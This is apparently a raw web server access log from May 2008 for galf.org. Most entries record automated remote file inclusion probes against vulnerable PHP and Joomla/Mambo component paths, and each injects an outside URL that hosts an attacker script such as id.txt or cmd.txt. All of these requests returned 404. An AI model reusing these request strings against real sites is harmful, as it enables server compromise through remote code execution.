72.32.68.172 - - [04/May/2008:17:42:14 -0700] "GET //administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:42:14 -0700] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:42:19 -0700] "GET /logs/access_071112.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.227.66.228 - - [04/May/2008:17:42:32 -0700] "GET /logs/access_071008.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.227.66.228 - - [04/May/2008:17:42:32 -0700] "GET /logs/access_071008.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.227.66.228 - - [04/May/2008:17:42:32 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.227.66.228 - - [04/May/2008:17:42:32 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.227.66.228 - - [04/May/2008:17:42:32 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.227.66.228 - - [04/May/2008:17:42:32 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.210.31.3 - - [04/May/2008:17:42:43 -0700] "GET /index1.php?pag=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.175.248.213 - - [04/May/2008:17:42:52 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://200.225.73.102/log/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.175.248.213 - - [04/May/2008:17:42:53 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://200.225.73.102/log/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.207.204.13 - - [04/May/2008:17:43:10 -0700] "GET /logs/access_080114.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.148.95.154 - - [04/May/2008:17:43:12 -0700] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.148.95.154 - - [04/May/2008:17:43:13 -0700] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:43:14 -0700] "GET /logs/access.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:43:14 -0700] "GET //administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:43:14 -0700] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.148.95.154 - - [04/May/2008:17:43:25 -0700] "GET /logs/access.log/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.148.95.154 - - [04/May/2008:17:43:25 -0700] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.148.95.154 - - [04/May/2008:17:43:25 -0700] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:43:27 -0700] "GET /logs/access_071112.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.164.242.195 - - [04/May/2008:17:44:34 -0700] "GET /logs/access_070827.log/index.php?d=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.164.242.195 - - [04/May/2008:17:44:34 -0700] "GET /index.php?d=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.164.242.195 - - [04/May/2008:17:44:34 -0700] "GET /logs/index.php?d=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.181.105.117 - - [04/May/2008:17:44:39 -0700] "GET /logs/access_070924.log/index2.php?url_page=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
202.181.105.117 - - [04/May/2008:17:44:40 -0700] "GET /index2.php?url_page=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
202.181.105.117 - - [04/May/2008:17:44:44 -0700] "GET /logs/index2.php?url_page=http://www.loichua.org/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
80.254.178.186 - - [04/May/2008:17:45:01 -0700] "GET //index.php3?aide=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [04/May/2008:17:45:08 -0700] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [04/May/2008:17:45:08 -0700] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
78.108.81.151 - - [04/May/2008:17:45:40 -0700] "GET //content.php?inc=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.148.95.154 - - [04/May/2008:17:45:47 -0700] "GET /logs/access_071112.log/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
66.225.229.167 - - [04/May/2008:17:47:58 -0700] "GET /logs/access_070826.log/squirrelcart//modules/My_eGallery/public/uploadFile.php?basepath=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
66.225.229.167 - - [04/May/2008:17:47:58 -0700] "GET /logs/squirrelcart//modules/My_eGallery/public/uploadFile.php?basepath=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
208.112.43.2 - - [04/May/2008:17:48:36 -0700] "GET /logs/access_080414.log//Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
80.254.178.186 - - [04/May/2008:17:48:38 -0700] "GET /logs/access_070924.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.254.178.186 - - [04/May/2008:17:48:39 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.254.178.186 - - [04/May/2008:17:48:40 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.225.229.167 - - [04/May/2008:17:48:41 -0700] "GET /logs/access_070820.log/squirrelcart//modules/My_eGallery/public/uploadFile.php?basepath=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.15.8.80 - - [04/May/2008:17:48:47 -0700] "GET /logs/errors.php?error=http://paginas.terra.com.br/lazer/xxxxfatalxxxx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
67.15.8.80 - - [04/May/2008:17:48:47 -0700] "GET /errors.php?error=http://paginas.terra.com.br/lazer/xxxxfatalxxxx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
80.254.178.186 - - [04/May/2008:17:48:57 -0700] "GET /logs/access_071119.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.210.31.3 - - [04/May/2008:17:49:05 -0700] "GET /index.php?include=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.19.150.85 - - [04/May/2008:17:49:12 -0700] "GET /logs/access_071029.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.203.209.2 - - [04/May/2008:17:49:53 -0700] "GET /logs/access_080414.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
78.108.81.151 - - [04/May/2008:17:53:51 -0700] "GET /logs/access_071008.log//content.php?inc=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
78.108.81.151 - - [04/May/2008:17:53:52 -0700] "GET /logs//content.php?inc=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
78.108.81.151 - - [04/May/2008:17:54:17 -0700] "GET /logs/access_071105.log//content.php?inc=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.149.209.100 - - [04/May/2008:17:54:27 -0700] "GET /logs/access_080407.log//Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.116.44.60 - - [04/May/2008:17:54:53 -0700] "GET /logs/access.log/playing.php/common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
208.116.44.60 - - [04/May/2008:17:54:53 -0700] "GET /playing.php/common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
208.116.44.60 - - [04/May/2008:17:54:53 -0700] "GET /logs/playing.php/common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
221.128.79.156 - - [04/May/2008:17:55:27 -0700] "GET /http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
221.128.79.156 - - [04/May/2008:17:55:27 -0700] "GET /logs/http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
221.128.79.156 - - [04/May/2008:17:55:28 -0700] "GET /http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.galf.org"
221.128.79.156 - - [04/May/2008:17:55:29 -0700] "GET /logs/http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.galf.org"
82.210.31.3 - - [04/May/2008:17:55:34 -0700] "GET /index.php?template=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.12.53.176 - - [04/May/2008:17:55:36 -0700] "GET /logs/access.log//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
195.12.53.176 - - [04/May/2008:17:55:36 -0700] "GET //content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
195.12.53.176 - - [04/May/2008:17:55:37 -0700] "GET /logs//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
82.210.31.3 - - [04/May/2008:17:55:39 -0700] "GET /logs/access_071008.log/index.php?include=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.210.31.3 - - [04/May/2008:17:55:39 -0700] "GET /index.php?include=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.210.31.3 - - [04/May/2008:17:55:40 -0700] "GET /logs/index.php?include=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
125.201.170.194 - - [04/May/2008:17:57:45 -0700] "GET /logs/access_071105.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
67.195.58.181 - - [04/May/2008:17:58:16 -0700] "GET /logs/access_080113.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
201.12.151.34 - - [04/May/2008:18:01:02 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bsthank.t35.com/CMDs/xigor.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
201.12.151.34 - - [04/May/2008:18:01:03 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bsthank.t35.com/CMDs/xigor.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
201.12.151.34 - - [04/May/2008:18:01:04 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bsthank.t35.com/CMDs/xigor.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
201.12.151.34 - - [04/May/2008:18:01:13 -0700] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bsthank.t35.com/CMDs/xigor.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
201.12.151.34 - - [04/May/2008:18:01:15 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bsthank.t35.com/CMDs/xigor.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
201.12.151.34 - - [04/May/2008:18:01:16 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bsthank.t35.com/CMDs/xigor.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
82.216.94.10 - - [04/May/2008:18:01:45 -0700] "GET /logs/access_080113.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5" "www.galf.org"
201.12.151.34 - - [04/May/2008:18:02:08 -0700] "GET /logs/access_080225.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bsthank.t35.com/CMDs/xigor.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
208.112.43.2 - - [04/May/2008:18:02:15 -0700] "GET /logs/access.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
208.112.43.2 - - [04/May/2008:18:02:15 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
208.112.43.2 - - [04/May/2008:18:02:15 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
67.15.205.17 - - [04/May/2008:18:02:20 -0700] "GET /components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.3alamyat.com/chat/photos/0/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
193.19.139.89 - - [04/May/2008:18:03:36 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
67.15.205.17 - - [04/May/2008:18:03:39 -0700] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.15.205.17 - - [04/May/2008:18:03:39 -0700] "GET //administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
193.19.139.89 - - [04/May/2008:18:03:42 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
193.19.139.89 - - [04/May/2008:18:03:47 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
125.201.170.194 - - [04/May/2008:18:03:47 -0700] "GET /logs/access_070924.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020527)" "www.galf.org"
195.54.9.218 - - [04/May/2008:18:04:39 -0700] "GET /logs/access_080317.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.54.9.218 - - [04/May/2008:18:04:39 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.54.9.218 - - [04/May/2008:18:04:39 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.180.251.34 - - [04/May/2008:18:05:23 -0700] "GET /index.php?x=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
67.15.205.17 - - [04/May/2008:18:07:14 -0700] "GET /components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.3alamyat.com/chat/photos/0/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
211.115.68.51 - - [04/May/2008:18:07:26 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
205.234.130.198 - - [04/May/2008:18:07:51 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rites.com/calls/excel/mail.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
195.54.9.218 - - [04/May/2008:18:08:03 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.54.9.218 - - [04/May/2008:18:08:45 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
67.195.58.184 - - [04/May/2008:18:09:05 -0700] "GET /logs/access_071231.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.12.35 - - [04/May/2008:18:10:16 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
74.6.7.180 - - [04/May/2008:18:11:41 -0700] "GET /logs/access_080113.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
211.115.68.51 - - [04/May/2008:18:13:42 -0700] "GET /logs/access_070917.log//modules/agendax/addevent.inc.php?agendax_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
211.115.68.51 - - [04/May/2008:18:13:43 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
211.115.68.51 - - [04/May/2008:18:14:03 -0700] "GET /logs/access_071014.log//modules/agendax/addevent.inc.php?agendax_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
67.15.205.17 - - [04/May/2008:18:14:15 -0700] "GET /logs/access.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.15.205.17 - - [04/May/2008:18:14:23 -0700] "GET /logs/access_071112.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
66.232.156.130 - - [04/May/2008:18:14:31 -0700] "GET /logs/access_070827.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
66.232.156.130 - - [04/May/2008:18:14:32 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
66.232.156.130 - - [04/May/2008:18:14:32 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
78.108.81.151 - - [04/May/2008:18:15:08 -0700] "GET /logs//index.php3?aide=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
78.108.81.151 - - [04/May/2008:18:15:09 -0700] "GET //index.php3?aide=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.71.36.82 - - [04/May/2008:18:15:09 -0700] "GET /logs/access_070723.log//%3Cwbr%20/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.71.36.82 - - [04/May/2008:18:15:09 -0700] "GET //%3Cwbr%20/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.71.36.82 - - [04/May/2008:18:15:10 -0700] "GET /logs//%3Cwbr%20/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.71.36.82 - - [04/May/2008:18:15:18 -0700] "GET /logs/access_070903.log//%3Cwbr%20/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
